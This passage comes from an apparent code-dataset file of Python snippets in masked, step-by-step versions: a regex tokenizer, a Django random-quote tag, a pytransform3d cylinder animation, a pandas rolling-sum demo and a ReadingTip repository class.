"step-4": "import re\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-5": "import re\n\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\b[A-Z][a-z]+[.]|\\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\\b[A-Za-z-]+|[.]+|[.,'\"!?:;]'''\n\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\n\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\n\nfor key in sorted(token_dictionary.keys()):\n print(\"{} {}\".format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django import template
import random
register = template.Library()
@register.simple_tag
def random_quote():
"""Returns a random quote to be displayed on the community sandwich page"""
quotes = [
"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney",
"We cannot accomplish all that we need to do without working together\n-Bill Richardson",
"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo",
"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz",
"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki",
"Communism will win.\n-Slavoj Zizek",
]
return random.choice(quotes)
|
normal
|
{
"blob_id": "6e73625adc10064cdb1b5f0546a4fc7320e9f5dc",
"index": 8366,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-3": "<mask token>\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-4": "from django import template\nimport random\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"\"\"Growth is never by mere chance; it is the result of forces working together.\n-James Cash Penney\"\"\"\n ,\n \"\"\"We cannot accomplish all that we need to do without working together\n-Bill Richardson\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Gloria Macapagal Arroyo\"\"\"\n ,\n \"\"\"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\n-Jacqueline Novogratz\"\"\"\n ,\n \"\"\"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\n-Adrianne Palicki\"\"\"\n , \"\"\"Communism will win.\n-Slavoj Zizek\"\"\"]\n return random.choice(quotes)\n",
"step-5": "from django import template\n\nimport random\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef random_quote():\n \"\"\"Returns a random quote to be displayed on the community sandwich page\"\"\"\n quotes = [\n \"Growth is never by mere chance; it is the result of forces working together.\\n-James Cash Penney\",\n \"We cannot accomplish all that we need to do without working together\\n-Bill Richardson\",\n \"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\\n-Gloria Macapagal Arroyo\",\n \"The power of one, if fearless and focused, is formidable, but the power of many working together is better.\\n-Jacqueline Novogratz\",\n \"I love a sandwich that you can barely fit in your mouth because there's so much stuff on it. The bread should not be the main thing on a sandwich.\\n-Adrianne Palicki\",\n \"Communism will win.\\n-Slavoj Zizek\",\n ]\n return random.choice(quotes)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
<|reserved_special_token_0|>
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=
length, radius=radius))
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
from pytransform3d.transformations import transform_from_exponential_coordinates
import pytransform3d.visualizer as pv
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=
length, radius=radius))
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
"""
==============================
Visualize Cylinder with Wrench
==============================
We apply a constant body-fixed wrench to a cylinder and integrate
acceleration to twist and exponential coordinates of transformation
to finally compute the new pose of the cylinder.
"""
import numpy as np
from pytransform3d.transformations import (
transform_from_exponential_coordinates)
import pytransform3d.visualizer as pv
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(
step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0: # Reset cylinder state
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
# Apply constant wrench
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(
dt * Stheta_dot).dot(prev_cylinder2world)
# Update visualization
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
# Definition of cylinder
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(
spatial_inertia_of_cylinder(mass=mass, length=length, radius=radius))
# State of cylinder
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if "__file__" in globals():
fig.animate(
animation_callback, n_frames=10000,
fargs=(cylinder, cylinder_frame, cylinder2world, twist, inertia_inv),
loop=True)
fig.show()
else:
fig.save_image("__open3d_rendered_image.jpg")
|
flexible
|
{
"blob_id": "2019a2a5588e57164ff4226ef3bcbbc506f2b315",
"index": 7432,
"step-1": "<mask token>\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\n<mask token>\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-3": "<mask token>\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=\n length, radius=radius))\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-4": "<mask token>\nimport numpy as np\nfrom pytransform3d.transformations import transform_from_exponential_coordinates\nimport pytransform3d.visualizer as pv\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=\n length, radius=radius))\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-5": "\"\"\"\n==============================\nVisualize Cylinder with Wrench\n==============================\n\nWe apply a constant body-fixed wrench to a cylinder and integrate\nacceleration to twist and exponential coordinates of transformation\nto finally compute the new pose of the cylinder.\n\"\"\"\nimport numpy as np\nfrom pytransform3d.transformations import (\n transform_from_exponential_coordinates)\nimport pytransform3d.visualizer as pv\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(\n step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0: # Reset cylinder state\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n\n # Apply constant wrench\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(\n dt * Stheta_dot).dot(prev_cylinder2world)\n\n # Update visualization\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n\n prev_cylinder2world[:, :] = cylinder2world\n\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\n\n# Definition of cylinder\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(\n spatial_inertia_of_cylinder(mass=mass, length=length, radius=radius))\n\n# State of cylinder\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\n\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\n\nfig.plot_transform(A2B=np.eye(4), s=0.5)\n\nfig.view_init()\n\nif \"__file__\" in globals():\n fig.animate(\n animation_callback, 
n_frames=10000,\n fargs=(cylinder, cylinder_frame, cylinder2world, twist, inertia_inv),\n loop=True)\n fig.show()\nelse:\n fig.save_image(\"__open3d_rendered_image.jpg\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# 代码3-14 pandas累积统计特征函数、移动窗口统计函数示例
import pandas as pd
D = pd.Series(range(0, 20)) # 构造Series,内容为0~19共20个整数
print(D.cumsum()) # 给出前n项和
print(D.rolling(2).sum()) # 依次对相邻两项求和
|
normal
|
{
"blob_id": "7639b80c9e6e1b2e1e55a47a862c433b64168cf6",
"index": 7475,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-3": "<mask token>\nD = pd.Series(range(0, 20))\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-4": "import pandas as pd\nD = pd.Series(range(0, 20))\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-5": "# 代码3-14 pandas累积统计特征函数、移动窗口统计函数示例\n\nimport pandas as pd\n\nD = pd.Series(range(0, 20)) # 构造Series,内容为0~19共20个整数\nprint(D.cumsum()) # 给出前n项和\nprint(D.rolling(2).sum()) # 依次对相邻两项求和\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ReadingTipRepository:
<|reserved_special_token_0|>
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
<|reserved_special_token_0|>
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ReadingTipRepository:
<|reserved_special_token_0|>
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
<|reserved_special_token_0|>
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
readingtip_repository = ReadingTipRepository()
<|reserved_special_token_1|>
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
    """Data-access layer for ReadingTip rows, backed by the shared db session."""

    def __init__(self):
        pass

    def get_tips(self, user, tag="all"):
        """Return all of *user*'s tips, optionally only those carrying *tag*."""
        if tag == "all":
            return ReadingTip.query.filter_by(user=user).all()
        return ReadingTip.query.filter_by(user=user).filter(
            ReadingTip.tags.any(name=tag)).all()

    def update_tip(self, tip_id, title, link, tags):
        """Overwrite the title, link and tag list of an existing tip.

        Fix: removed a leftover debug print(tags) that wrote to stdout on
        every update.
        """
        tip = self.get_tip(tip_id)
        tip.title = title
        tip.link = link
        tip.tags = tags
        db.session.commit()

    def create_tip(self, tip):
        """Persist a new tip and return it."""
        db.session.add(tip)
        db.session.commit()
        return tip

    def get_tip(self, tip_id):
        """Fetch a single tip by primary key (None when no such id exists)."""
        return ReadingTip.query.get(tip_id)

    def delete_tip(self, tip):
        """Remove a tip permanently."""
        db.session.delete(tip)
        db.session.commit()

    def contains_title(self, user, title):
        """True when *user* already has a tip with this exact title."""
        return ReadingTip.query.filter_by(user=user, title=title).count() > 0

    def read_tip(self, tip, date):
        """Mark *tip* as read on *date*."""
        ReadingTip.query.filter_by(id=tip.id).update({"read": date})
        db.session.commit()
# Module-level shared instance used by importers of this module.
readingtip_repository = ReadingTipRepository()
|
flexible
|
{
"blob_id": "d82b68d5c83ae538d7a8b5ae5547b43ac4e8a3d4",
"index": 6910,
"step-1": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n <mask token>\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n <mask token>\n <mask token>\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
